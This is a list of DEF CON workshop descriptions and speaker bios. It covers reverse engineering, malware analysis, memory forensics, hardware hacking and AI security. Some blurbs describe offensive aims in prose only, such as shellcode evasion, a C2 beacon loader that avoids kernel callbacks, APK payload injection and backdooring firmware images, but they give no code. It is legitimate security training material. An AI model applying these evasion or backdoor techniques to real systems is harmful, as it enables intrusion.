DEF CON Workshops List

Assembly language has a reputation for being intimidating, but once you learn the basics–and know how to read the documentation for the rest–you can easily pick up the rest. There are many interesting fields of study in computer security that depend on the “closer to the metal” knowledge you’ll gain from learning to code in assembly:

• Software reverse engineering
• Vulnerability and exploit research
• Malware/implant development
• Digital forensics

…among others. There is no substitute for the confidence that you gain from being able to research and understand computer systems at lower levels of abstraction.

The purpose of this workshop is to introduce Intel x64 architecture and assembly language to the attendees. We will be using the Microsoft Macro Assembler, and we will be examining our code step-by-step in the x64dbg debugger. No prior programming experience is required–we will be working on things from first principles. There will be few slides. This is a new version of the workshop that makes better use of the x64dbg debugger to illustrate concepts of the class, live. Attendees can follow along with their own laptops and programming environments.

Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.

Malware analysis and reverse engineering involve intricate execution, obfuscation, and anti-analysis techniques that hinder traditional debugging. This intensive, hands-on workshop introduces WinDbg’s powerful Time Travel Debugging (TTD), allowing you to record a complete execution trace and replay it forwards and backwards. Designed for reverse engineers and malware analysts, this workshop provides practical skills to harness TTD, significantly cutting analysis time compared to traditional methods.

Throughout this 4-hour session, dive directly into practical application. Start with TTD essentials and capturing traces (GUI/CLI), then quickly progress to navigating timelines efficiently. Gain proficiency using the Debugger Data Model and LINQ queries to rapidly locate key events, API usage, and suspicious memory patterns within large traces. Crucially, learn to automate analysis by creating powerful JavaScript extensions for WinDbg, applying these skills in hands-on labs focused on tasks like extracting dynamically deobfuscated strings from malware. Leave equipped to confidently integrate WinDbg TTD into your workflow, accelerating your triage and deep-dive analysis capabilities.

Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.

Jae Young Kim is a Senior Reverse Engineer on Mandiant’s FLARE Team where he reverses malware and contributes to FLARE’s automated analysis and binary similarity efforts. He is a seasoned instructor and a core contributor to FLARE’s educational content development efforts. He has a Bachelors in Computer Science from Columbia University.

When you are reverse engineering a file and have to repeatedly perform the same mundane task, you start to wonder how to perform the action automatically. This workshop provides the basis for automating tasks with Ghidra. We will look at a wiper used to target Ukrainian victims in late February 2022.

This four-hour workshop primarily focuses on how to automate repeated activities and how to think in a way that is supported by the analysis framework’s API. You can transfer this knowledge to other reverse engineering suites, although the specific API calls will differ. This class is perfect for aspiring and beginning analysts, while also providing background information and additional techniques for intermediate analysts.

The workshop’s materials consist of multiple malware samples, the precautions for which will be explained in-detail during the workshop, ensuring the safety and integrity of the systems of the attendees. An x86_64 laptop with Ubuntu 22.04 or later, along with Ghidra, Eclipse, and OpenJDK 21 is required. Its mandatory to be able to understand the basics of assembly language and decompiled code, and to be able to read and write Java. Python 2 can be used as a substitute if desired, but is not fully supported.

Max Kersten is a malware analyst, blogger, and speaker who aims to make malware analysis more approachable for those who are starting. In 2019, Max graduated cum laude with a bachelor’s in IT & Cyber Security, during which Max also worked as an Android malware analyst. Currently, Max works as a senior malware analyst at Trellix, where he analyses APT malware and creates open-source tooling to aid such research. Over the past few years, Max spoke at international conferences, such as DEFCON, Black Hat (USA, EU, MEA, Asia), Botconf, Confidence-Conference, HackYeahPL, and HackFestCA. Additionally, he gave guest lectures and workshops for DEFCON, Botconf, several universities, and private entities.

Get ready to leap into the wild world of Windows shellcode! This fast-paced workshop covers how to analyze and create shellcode, using state-of-the-art tools. Intended for those with intermediate knowledge, this workshop will review x86 assembly; you will learn Windows internals, and advanced shellcoding techniques. You’ll learn how to dissect shellcode with x32Dbg or WinDbg and how to use the SHAREM shellcode emulator for deep analysis and disassembly. After analyzing several samples, we’ll build our own shellcode, starting simple and moving on to intermediate multi-API shellcode. You will learn how to encode your shellcode, for evasion, and how to incorporate Windows syscalls directly into your shellcode, for extra stealth. Finally, we will cover converting DLLs to shellcode. Expect to be made privy to a variety of shellcoding tips and tricks. By the end, you’ll be able to: • Quickly read and debug obfuscated shellcode; • Implement GetPC techniques in shellcode; • Chain WinAPIs to pass handles/pointers; • Add direct Windows syscalls for stealth to shellcode; • Convert DLLs to shellcode with sRDI. Prep: Study x86 assembly and basic Windows debugging. We recommend a Windows VM with Windows Defender disabled, plus NASM, x32Dbg, WinDbg (classic), SHAREM, and ShellWasp.

Dr. Bramwell Brizendine has a Ph.D. in Cyber Operations and is the Director of the VERONA Lab. Bramwell has regularly spoken at DEFCON and presented at all regional editions of Black Hat (USA, Europe, Asia, MEA), as well as at Hack in the Box Amsterdam and Wild West Hackin’ Fest. Bramwell received a $300,000 NSA research grant to create the SHAREM shellcode analysis framework, which brings unprecedented capabilities to shellcode analysis. He has additionally authored ShellWasp, which facilitates using Windows syscalls in shellcode, as well as two code-reuse attack frameworks, ROP ROCKET and JOP ROCKET. Bramwell has previously taught undergraduate, master’s, and Ph.D. courses on software exploitation, reverse engineering, offensive security, and malware analysis. He currently teaches cybersecurity courses at the University of Alabama in Huntsville.

Dr. Austin Norby is a seasoned cybersecurity professional with over a decade of experience supporting the Department of Defense. He earned his bachelor’s degrees in mathematics and computer science from the University of Minnesota, a master’s degree from the Naval Postgraduate School, and a Doctorate in Cyber Operations from Dakota State University, specializing in anti-debugging techniques. Currently, Dr. Norby serves as the Director of Internal Research and Development at Bogart Associates, where he is responsible for spearheading the creation of advanced cybersecurity solutions for government use. His technical proficiencies include reverse engineering, malware analysis, and software engineering, with a strong focus on developing robust cyber capabilities in C, C++, Intel assembly, and Python.

Logan Cannan received the B.S. and M.S. degrees in Computer Engineering and Cybersecurity from the University of Alabama in Huntsville. He is currently a Ph.D. candidate for a degree in Computer Engineering in a joint degree program with the University of Alabama at Birmingham and the University of Alabama in Huntsville. After spending time at Idaho National Laboratory, working in both ICS vulnerability analysis and machine learning assisted code analysis, he focused his dissertation research on optimization for machine learning on binary analysis and reverse engineering tasks.

Every watt and bit tells a story.

The concept of “smart grids” dates back to the 1970s with automatic meters, but the term emerged with the Energy Independence and Security Act of 2007. Since 2012, the integration of smart grids and Cloud computing has been a topic at IEEE meetings. This raises key questions: How do we assess risks to physical and virtual infrastructure? What are the impacts of a breach? Where does digital forensics fit in?

Since 2017, the Cloud Forensics Workshop has introduced security professionals to core Cloud forensics concepts. The latest Smart Grid Edition explores the relationship between smart grids, Cloud computing, and digital forensics. Participants will engage in hands-on labs using open-source tools to identify indicators of compromise (IoCs), acquire forensically sound artifacts, and apply AI and automation in investigations. Registered students will download sample data before the workshop and apply their skills in a live tabletop exercise.

Kerry Hazelton – also known as “Professor Kilroy” – has been involved in the technology and security industry for over twenty-five years crafting his own version of “Protection Against the Dark Arts” with an extensive knowledge of information systems, data center operations, Cloud computing, digital forensics, and incident response.

Ever the security enthusiast and a sucker for movie references, combined with a deep passion for teaching and mentoring; Mr. Hazelton created the Cloud Forensics Workshop and CTF Challenge in 2017, which is a technical workshop that focuses on learning about the science of Cloud forensics and its real-world applications, followed by a Capture-the-Flag competition to gauge his students’ comprehension and critical-thinking skills by solving multiple forensic puzzles in a race against each other within the allotted amount of time.

He can be found posting his random thoughts on gaming, hacking, or life in general somewhere on the medium known as the Internet.

This workshop is for SOC analysts, threat hunters, and defenders dealing with alert fatigue, fragmented telemetry, and the challenge of spotting coordinated attacks. Instead of large language models or costly vendor tools, we’ll use open-source, explainable ML to map alerts, logs, and events into contextualized attack stories.

Attendees will work hands-on with real-world-style data to find root causes, build kill chains, and generate actionable tickets—False Positive, Incident, and Attack Story—that mirror real SOC workflows. We’ll use the Attack Flow Detector tool, which runs in Google Colab—no install needed.

No data science experience required. The class is technical but beginner-friendly, with guided exercises and examples. Basic knowledge of logs and MITRE ATT\&CK helps but isn’t required. The focus is on outcomes: understanding what happened, why, and how to respond—without black-box AI or complex queries.

By the end, students will know how to clean noisy data, map alerts to attacker techniques, cluster related events, and build end-to-end attack narratives. All tools and content are open-source, transparent, and ready to use in real environments.

Ezz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada’s Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.

This workshop provides an in-depth, hands-on experience in the creation and analysis of malicious applications, focusing on the techniques used by attackers to compromise mobile devices. Participants will learn how to manipulate Android applications using tools such as Android Studio, APKTool, Burp Suite, and Metasploit to inject payloads, bypass security mechanisms, and establish remote access. Through step-by-step demonstrations, they will explore methods for obfuscation, privilege escalation, and persistence, gaining a clear understanding of how adversaries exploit vulnerabilities in mobile environments.

Beyond offensive techniques, the workshop emphasizes defensive strategies, equipping attendees with skills to detect, analyze, and mitigate mobile threats. Using malware analysis and reverse engineering, students will learn how security professionals track, neutralize, and prevent attacks. Real-time lab exercises will reinforce these concepts, ensuring that participants leave with practical expertise applicable to ethical hacking, penetration testing, and security research. This session is ideal for cybersecurity professionals, developers, and researchers looking to deepen their knowledge of mobile security and ethical hacking methodologies.

HackeMate is the YouTube channel where Gianpaul Custodio, a Offensive Cybersecurity Engineer, shares his expertise in ethical hacking, as well as offensive and defensive security. With over 28,000 subscribers engaged in the world of cybersecurity, he has established himself as a key figure in the community through challenges, technical analyses, and hands-on demonstrations.

Professionally, he holds Red Team certifications such as the eLearnSecurity Junior Penetration Tester (eJPT) and Web Penetration Tester (eWPT), along with Blue Team certifications like Microsoft Azure Fundamentals (AZ-900) and Microsoft Security, Compliance, and Identity Fundamentals (SC-900). He is also a Google Product Expert for Google Drive, contributing his knowledge in cloud security and optimization.

In this hands-on workshop you’ll move beyond the theory of network fingerprinting and actually use them in practice at both the TCP and TLS layers. Working in live lab environments, you will:

1. Capture real TLS ClientHello and TCP handshake packets with muonfp, p0f, ja3, ja3n and ja4
2. Normalize the JA3 into JA3n, overcoming TLS extension shuffle of modern browsers
3. Translate MuonFP fingerprint detections into classic p0f signatures
4. Compile those signatures into BPF and iptables bytecode to dynamically block scanners
5. Detect & block mass-scan traffic from ZMap and Masscan in real time without interrupting any other traffic.
6. Forge your own fingerprints (Windows, Linux, common browsers) with Scapy, then validate that your defenses can’t tell you apart.

Vlad is the co-founder and cybersecurity expert at ELLIO and President of the Anti-Malware Testing Standards Organization (AMTSO).A true cybersecurity enthusiast, Vlad’s passionate about network security, IoT, and cyber deception. Before ELLIO, he founded and led the Avast IoT Lab (now Gen Digital), developing security features and researching IoT threats. He has spoken at many conferences, including Web Summit and South by Southwest (SXSW), where he demonstrated IoT vulnerabilities.

This workshop is designed to give students the skills they need to identify and defeat common evasion techniques used by malware. It’s broken up into three hands-on modules where students will work with a range of open-source (or otherwise free) tools to dig into malicious code, examine different evasion techniques, and learn how to circumvent them to better understand how the malware operates. We’ll be using a mix of instructor-created malware samples—with full source code provided so students can analyze both the binary and the code side-by-side—and real-world samples found in the wild. By the end of the workshop, students will walk away with several malware samples, pages of code to keep digging into on their own, and a solid toolkit of techniques for breaking through typical anti-analysis and evasion tricks used in modern malware.

Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book “Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats” and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.

Randy leads threat detection and engineering teams at Proofpoint, using custom dynamic sandbox systems to detect evasive malware and phishing threats that target customers around the world. He previously led threat hunting and endpoint detection engineering at Binary Defense, and investigated botnets and other cyber criminal activities as a member of the FBI Cyber Action Team and Seattle Cyber Task Force. Randy currently volunteers as a digital forensic analyst with The DFIR Report, and organizes DEATHCon, a global conference for Detection Engineering and Threat Hunting workshops.

This hands-on technical training dives deep into the mechanics and mitigation of signal jamming—an increasingly critical threat in both civilian and military communication systems. Attendees will explore the electromagnetic spectrum, modulation techniques, and the physical principles that enable signal jamming. We will analyze common types of jammers, their circuitry, and how they disrupt RF communications. Participants will also gain insight into detection methods, spectrum analysis, and counter-jamming strategies using SDRs and directional antennas. The course balances theory and practice, with live demonstrations and dissection of real-world jamming scenarios. Prior familiarity with RF fundamentals and basic electronics is helpful but not required. To get the most from this session, attendees are encouraged to review basic electromagnetic theory and brush up on SDR tools like GNU Radio or SDR# ahead of time. This session is ideal for cybersecurity professionals, drone operators, RF engineers, and technical hobbyists seeking to understand and combat one of the most disruptive tools in electronic warfare.

Preston Zen is a OSCE3 Cybersecurity Certified maker and breaker of all things technology from custom electronics to bespoke software. Humanitarian volunteer in Ukraine since 2022 in logistics and engineering as well as one of the leading innovators of field implemented technology use cases

DLL Loading is one of the most important parts of the Windows system. When you install, run, use, or hack a system, you will always use DLL. This DLL mechanism has been exploited for several years for malware development through several techniques : DLL injection, Reflective DLL but do you really know how Windows is loading a DLL ? The sections used, the internal structures and how the dependencies are resolved. Are you able to design your own Perfect DLL Loader that fully integrate with the WIN32API? In this workshop, you will dive into the Windows DLL mechanism to understand how all of it works internally. With a decompiler, trial and errors, step by step, you will build your own (almost) Perfect DLL loader. You will try to load from the simple AMSI.DLL to the most complex WINHTTP.DLL. At each step, you will dive deeper into the Windows Internals. Malware developers, you will be able to use this code as a PE loader that never failed me for the last years and a DLL loader that does not raise the LoadImage kernel callback you can use on your own C2 beacon. WARNING: while this is a windows internal DISCOVERY course, it is still a HIGHLY TECHNICAL workshop. You should have some entry-level knowledge on Windows systems, C programing and reverse engineering to fully enjoy the workshop.

Yoann Dequeker (@OtterHacker) is a red team operator at Wavestone entitle with OSCP and CRTO certification. Aside from his RedTeam engagements and his contributions to public projects such as Impacket, he spends time working on Malware Developpement to ease beacon deployment and EDR bypass during engagements and is currently developing a fully custom C2.

His research leads him to present his results on several conferences such as LeHack (Paris), Insomni’hack, BlackAlps (Swiss) or even through a 4-hour malware workshop at Defcon31 and Defcon32 (Las Vegas). All along the year, he publishes several white papers on the techniques he discovered or upgraded and the vulnerabilities he found on public products.

Real threats leave behind real artifacts — and in this hands-on workshop, we’ll combine malware development and analysis by safely recreating and dissecting a custom malware based on Lumma Stealer, one of today’s most active malware families. This approach is designed to support adversary emulation efforts by replicating real-world TTPs in a controlled environment, while also teaching participants how to detect and analyze each technique. Whether you’re on a red or purple team looking to simulate attacker behavior, or on a blue team aiming to strengthen detection capabilities, this workshop delivers practical skills grounded in real-world threats.

Sebastian breaks things to understand them—and sometimes to teach others how to do it better. He’s spent years in red teaming, malware reversing, and purple team exercises—learning how attackers think, and how defenders can think better. These days, he builds labs, breaks code, and shares what he learns so others can level up, too.

Ricardo Sanchez is an accomplished cybersecurity professional with a passion for empowering others through knowledge sharing. As a Security Architect at one of Peru’s leading insurance companies, he specializes in designing innovative technology strategies for threat intelligence, detection engineering, and threat hunting to combat evolving cyber threats. Committed to lifelong learning, Ricardo thrives on analyzing malware and staying at the forefront of cybersecurity advancements.

Volatility 3 is the latest version of the Volatility Memory Analysis framework and is a complete re-design and rewrite of the framework suited to meet the needs of modern investigations. In this workshop, students will learn Volatility 3’s new features aimed at efficiency and usability as well as all the new and updated Windows plugins capable of detecting modern malware. During the workshop, students will experience a mix of lecture and live demonstration about the latest malware techniques followed by hands-on labs that will require students to analyze infected memory samples. While students complete each lab, instructors will walk to each student’s station to ensure they are progressing. An instructor will also completely walk through each lab live, and students are given a 35+ page PDF lab guide that contains all the lab scenarios, questions, and detailed answers, including many screenshots and explanations. Students can then use the course slides and lab guide to practice labs over time as well as to guide real-world investigations of compromised systems. By attending this workshop, students will leave knowing the most effective ways to detect modern Windows malware using the latest version of the mostly widely used open-source framework for memory analysis.

Andrew Case is the Director of Research at Volexity and has significant experience in incident response handling, digital forensics, and malware analysis. Case is a core developer of Volatility, the most widely used open-source memory forensics framework, and a co-author of the highly popular and technical forensics analysis book “The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory.” Case has spoken at many industry conferences, including DEF CON, Black Hat, RSA, DFRWS, SecTor, BSides*, and OMFW.

Lauren Pace is a PhD Student Researcher at Louisiana State University. She is a recipient of a Scholarship for Service scholarship and is performing funded research on complex problems and topics in memory forensics. Lauren has delivered Volatility 3 workshops at conferences, such as DFRWS, and is actively involved in her local cybersecurity clubs and community.

Daniel Donze (He/Him) is a PhD Student Researcher in Computer Science at Louisiana State University. His research has previously contributed to the Volatility Framework, and his current interests include memory forensics and malware analysis. He has presented research at BSides Las Vegas as well as several local events. He previously worked as a fullstack web and software developer and security researcher. His hobbies include cooking, playing guitar, mixology and craft beer.

Traditional patching has failed to scale – it’s time for a new approach. This hands-on workshop teaches you to eliminate entire bug classes with modern browser security features instead of endlessly reacting to reports. Instead of firefighting the same issues, you’ll learn how Content-Security-Policy v3, Trusted Types, and Sec-Fetch-Metadata go beyond traditional OWASP recommendations to prevent vulnerabilities at scale.

You’ll work with a training app that’s already secured, but we’ll go further. By applying advanced browser defenses, testing effectiveness, and enforcing security at scale, you’ll experience firsthand how modern web standards protect both new and legacy systems.

This isn’t just about fixing issues – it’s about scaling security across an organization. We’ll explore measuring adoption across hundreds of services, automating enforcement, and applying defense-in-depth beyond single vulnerabilities.

Through interactive group challenges, you’ll tackle real-world vulnerabilities, enforce modern safeguards, and transform how you approach web security. Whether you’re a developer, security engineer, or architect, you’ll leave with practical tools and a proactive security mindset – moving from patching to prevention.

Javan is a Senior Application Security Specialist at Sage, helping product teams enhance security throughout the software development lifecycle. On the side, he lectures Secure Coding at DHBW University in Germany. His journey as an ethical hacker began young, where he began to automate online games using bots and identified security bugs, which he then reported to the game operators. Javan made his interests into his profession and began as a full stack web and mobile engineer before transitioning into a passionate security consultant. Javan holds a Master’s degree in IT Security Management and several certifications, including GXPN, AIGP, CISSP, CCSP, and CSSLP. He has shared his research at conferences, including OWASP Global AppSec, DEFCON, and HITB.

EMMC is a common flash memory format for more complex embedded devices and the Ball Grid Array (BGA) is a popular format for EMMC modules. BGA modules can be intimidating to hardware hackers since the pins are not exposed and are instead underneath the chip. This workshop will demonstrate and allow you to practice removing EMMC modules from an inexpensive circuit board using flux and a hot air station. The module will contain a Linux operating system and a Raspberry Pi. Workshop participants will learn how to image the removed EMMC. Mount and change the Linux filesystem in order to backdoor the image and gain access, and then learn how to copy the image to a new EMMC. Participants will then learn how to attach the module to a BGA carrier board with hot air.

A basic understanding of soldering is all that is required to be successful in this workshop. An understanding of the Linux filesystem is also helpful, but not required. We will have step by step instructions and will also have a small prize for the participant who comes up with and demonstrates the most clever Linux backdoor on their Raspberry Pi.

At the end of this workshop, participants will have an understanding of: How to remove, clean and image BGA modules Basics of offline Linux filesystem hacking How to image and reattach BGA EMMC modules

Patricck is a Principal Red Team Consultant at Mandiant with over 20 years of information security experience working with both US Govt and private sector employers. Patrick has spoken at DEF CON, BlackHat, Bsides and RSA. Patrick can usually be found in the Car Hacking or Aerospace village where he volunteered for several years. His passion is embedded systems security and has released research in Avionics, embedded systems and even bricked his own Tesla while trying to make it faster.

In today’s landscape, generative AI coding tools are powerful but often insecure, raising concerns for developers and organizations alike. This hands-on workshop will guide participants in building a secure coding assistant tailored to their specific security needs.

We’ll begin by exploring the security limitations of current AI coding tools and discussing why fine-tuning is critical for secure development. Participants will then create and fine-tune their own LLM-based assistants using provided examples and their own use cases. By the end of the session, each attendee will have a functioning, security-focused AI coding assistant and a clear understanding of how to improve it further.

Or Sahar is a security researcher, software engineer, and cofounder of Secure From Scratch — a venture dedicated to teaching developers secure coding from the very first line of code. She has worked for many years as a developer and developer team leader, before transitioning her career path to focus on hacking, application vulnerability research and security in the context of AI. Or is currently pursuing a master’s degree in computer science and lectures in several colleges.

Yariv Tal is a senior developer & security researcher, and the cofounder of Secure From Scratch – a venture dedicated to teaching developers secure coding from the very first line of code. A summa cum laude graduate from the Technion, leveraging four decades of programming expertise and years of experience in university lecturing and bootcamp mentoring, he brings a developer’s perspective to the field of security. Currently, he lectures on secure coding at several colleges and the private sector, he is the leader of the owasp-untrust project and is currently pursuing a master’s degree in computer science and lectures in several colleges.

As AI becomes integral to critical systems, its vulnerabilities to adversarial attacks and data-related weaknesses pose serious risks. This interactive, one-day training is designed for AI practitioners, researchers, and security professionals to understand and mitigate these challenges. Participants will gain a comprehensive foundation in AI security, exploring adversarial attack techniques, defense mechanisms, and best practices for building robust datasets.

Vishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.

He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for APAC region at Atlassian.

John Lopes is a passionate information security professional with specialist knowledge in digital forensics and incident response (DFIR), cyber threat intelligence and offensive security practices. He has over 20 years industry experience with a proven ability to help organisations defend and protect against cyber threats. John is a member of Institute of Electronic and Electrical Engineers (IEEE), International Information System Security Certification Consortium Inc. (ISC2) and a member of the Information Systems Audit and Control Association (ISACA).  John has worked in  roles as a part of the Global Incident Response Teams at Salesforce and AWS.

This hands-on workshop explores the offensive and defensive security challenges of Generative AI (GenAI). In the first half, participants will use structured frameworks and rapid threat prototyping to map out real-world GenAI risks such as – prompt injection, data poisoning, and model leakage. Working in teams, you’ll threat model a GenAI system using simplified STRIDE and Rapid threat prototyping techniques and visual diagrams.

The second half flips the script: you’ll build lightweight security tools that harness GenAI for good crafting utilities. No prior AI experience is required; everything is explained as we go.

This workshop is ideal for red teamers, security engineers, and curious builders. Just bring basic Python familiarity and a laptop – we’ll supply the rest.

You’ll walk away with real-world threat models, working tool prototypes, and a clear framework for breaking and securing AI systems in your org.

Ashwin Iyer is a cybersecurity architect with 12+ years of experience across red teaming, threat modeling, and cloud security. He currently leads offensive security for mergers and acquisitions at Visa Inc., conducting advanced penetration tests and threat evaluations of critical financial infrastructure.

Previously at SAP Ariba, he built and led the red team program, developing internal CTFs, defining SOC SLAs, and identifying high-impact vulnerabilities across global B2B platforms.

Ashwin is an EC-Council CodeRed instructor (Session Hijacking & Prevention), a reviewer for Hands-On Red Team Tactics (Packt), and a contributor to PCI SSC’s segmentation guidance for modern networks. He has delivered hands-on workshops at BSidesSF, HackGDL, and Pacific Hackers on topics like GenAI threat modeling, Practical Threat Modeling for Agile.

He holds certifications including OSCP, OSEP, GCPN, OSMR, CTMP and few others. When not hacking cloud platforms or vendor portals, he’s mentoring teams on how to think like attackers.

Ritika Verma is a cybersecurity engineer and AI security researcher with 7.5+ years of experience across enterprise security, cloud infrastructure, and applied AI. She has led security initiatives at SAP and Accenture, where she implemented MITRE ATT&CK frameworks, automated detection pipelines, and secured large-scale IAM and DLP environments.

Currently pursuing her MS in Information Systems with an AI/ML focus at Santa Clara University, Ritika researches LLM security, RAG pipelines, and GenAI abuse patterns. Her open-source projects — including an AWS vulnerability triage agent (VISTA), a RAG-based compliance engine, and a CI/CD DevSecOps pipeline — reflect her obsession with bridging security engineering and real-world AI applications.

She has placed 2nd in a Pre-Defcon CTF hosted at Google, mentored future security talent through WiCyS and NIST/NICE, and served as President of the SCU AI Club. Ritika is passionate about building secure-by-default systems, mentoring women in cybersecurity, and rethinking how LLMs are evaluated and abused in production environments.

The Internet is a dangerous place. Fortunately, hackers have created tools to make it safer. VPNs anonymize traffic but still expose IP addresses. Companies claim not to log, but how quickly will they hand over our data when they receive a warrant? Tor networks reroute traffic, but performance suffers as a result. Can we trust these distributed networks? Who owns the exit nodes? Finally, apps like Signal offer E2EE secure comms but in a proprietary and siloed way. Open source means very little if an app operates in a Walled Garden. Are there back doors? Is our data really safe?

In this workshop we’ll create a Hacker VPN that combines the best of VPNs, Tor, and E2EE secure comms apps. We’ll use modern-day PQC encryption to implement a secure protocol. We’ll use both TCP/UDP as our network protocols to demonstrate flexibility in design. We’ll support packet sharding, random noise injection, multi-hop routing, and 100% anonymity between network endpoints. We’ll do all this on Linux with standard C++, CMake & OpenSSL. At the end of this workshop you’ll have all the tools you need to take the Hacker VPN to the next level. Why trust outdated software from shady companies when you can build your own modern day, kick-ass implementation?

Yes, the Internet is a dangerous place. But it’s much safer when we take control.

Eijah is the founder of Code Siren, LLC and has 25+ years of experience in software development. He is the creator of Polynom, the world’s first CNSA Suite 2.0 PQC collaboration app. He is also the developer of Demonsaw, an encrypted communications platform that allows you to share information without fear of data collection or surveillance. Before that Eijah was a Lead Programmer at Rockstar Games where he created Grand Theft Auto V and Red Dead Redemption 2. In 2007, Eijah hacked multiple implementations of the Advanced Access Content System (AACS) protocol and released the first Blu-ray device keys under the pseudonym, ATARI Vampire. He has been a faculty member at multiple colleges, has spoken at DEF CON and other security conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.

Benjamin is a technology professional and lifelong hacker whose journey began with an Amiga 1000 and an endless sense of curiosity. He taught himself how to keep it running—troubleshooting, repairing failed components, and learning the ins and outs of the machine. From there, he moved on to DOS on a Packard Bell and eventually to building custom systems. That early hands-on experience evolved into a career spanning multiple industries and roles, where he designed, deployed, and managed complex networks and systems. While hardware remains a passion, his current work focuses on secure communications and building tools for resilient network infrastructure. When he’s not buried in RFCs, technical docs, or writing integrations, Benjamin is likely rock climbing or exploring underwater cave systems—boldly going where no man has gone before.

Tired of legacy ICS systems? Attend this workshop to hack the next generation of Industrial Control Systems,! No more Modbus, no more standard PLC, no more Purdue model! This workshop is designed to show what the future might look like for Industrial Control Systems, with a focus on ML & AI!

We’ll bring a realistic ICS setup that features all the fancy current and future trends: SD-WAN and Zero Trust, OPC-UA, MQTT, Digital Twin, Edge devices and soft-PLCs to control a small-scale industrial process simulation. This year, we’ll also add some machine learning and LLM challenges! Will you be able to trick the ICS virtual assistant into giving you access to the production systems?

After a short introduction, we’ll get into hacking! We will walk you through a CTF-style exercise to go from 0 to full industrial process hacking! The CTF will be guided so that everyone learns something and gets a chance to get most flags!

Arnaud Soullié is a Senior Manager at Wavestone, a global consulting company. For 15 years, he has been performing security assessments and pentests on all types of targets. He started specializing in ICS cybersecurity 10 years ago. He has spoken at numerous security conferences on ICS topics, including: BlackHat Europe, BruCon, 4SICS, BSides Las Vegas, and DEFCON. He is also the creator of the DYODE project, an open source data diode aimed at ICS. He has taught ICS cybersecurity trainings since 2015.

Alexandrine Torrents is a Senior Manager at Wavestone. She started as a penetration tester, and performed several cybersecurity assessments on ICS. She worked on a few ICS models to demonstrate attacks on PLCs and developed a particular tool to request Siemens PLCs. Then, she started working at securing ICS, especially in the scope of the French military law, helping companies offering a vital service to the nation to comply with security rules. Now, Alexandrine works with different industrial CISOs on their cybersecurity projects: defining secure architectures, hardening systems, implementing detection mechanisms. She is also IEC 62443 certified and still performs assessments on multiple environments.

There is a creature that lives inside our smartphones, laptops, and PCs, quietly driving their most cutting-edge behaviors. Much larger versions of it hide in datacenters around the world, constantly crunching through massive computation problems. And yet, even experienced engineers find it mysterious. Originally made to boost graphics performance, it has evolved into the engine that powers technologies behind systems like Claude and ChatGPT. In this workshop, we will uncover the nature of this creature: the GPU. Starting with its history and evolution, we will explore how a processor meant to accelerate 3D graphics became the driving force behind modern machine learning and AI. Along the way, we will dive into the design and behavior of neural networks, and discover how a machine built for graphics rendering learned to interpret images and speak human language. Finally, we will investigate how the complexity of neural networks made possible by GPUs can lead to unexpected and strange behaviors… some of which may not be accidental.

Eigentourist is a programmer who learned the craft in the early 1980s. He began formal education in computer science when the height of software engineering discipline meant avoiding the use of GOTO statements. Over the course of his career, he has created code of beautiful simplicity and elegance, and of horrific complexity and unpredictability. Sometimes, it’s hard to tell which was which. Today, he works on systems integration and engineering in the healthcare industry.

Did you ever wanted to hack an IoT device but did not know how to start? Having UART is nice, but does not help in many cases.

For a complete analysis of an IoT device, it is required to look at the firmware itself. In most cases this means that the firmware, data or encryption keys need to be extracted from the device memory. Many researchers are hesitant to do that as there is a high risk of destroying the device or leaving it in an inoperable state. In this workshop we will look at different flash memory types (EEPROM, SPI flash, NAND flash, eMMC flash) and how to extract the information from them.

We will show that you do not need very expensive hardware to archive your goal and that it is not as complicated as everyone believes. See which tools might be useful for your own lab!

Participants will have the opportunity to work in groups and being provided different kinds of IoT devices (e.g. smart speakers). After a tear-down, you can use different chip-off methods (e.g. Hot air, IR soldering) to remove the flash chip and read it out. Optionally, the tools re-ball and re-solder the IC will be available after the workshop. In the end, each team should have the data and a functional device again.

Bonus: If you brick the device, you can keep the parts as a souvenir or can wear them as badges.

Dennis Giese is a researcher with the focus on the security and privacy of IoT devices. While being interested in physical security and lockpicking, he enjoys applied research and reverse engineering malware and all kinds of devices. His most known projects are the documentation and hacking of various vacuum robots. He calls himself a “robot collector” and his current vacuum robot army consists of over 80 different models from various vendors. He talked about his research at the Chaos Communication Congress, REcon, HITCON, NULLCON, and DEFCON.

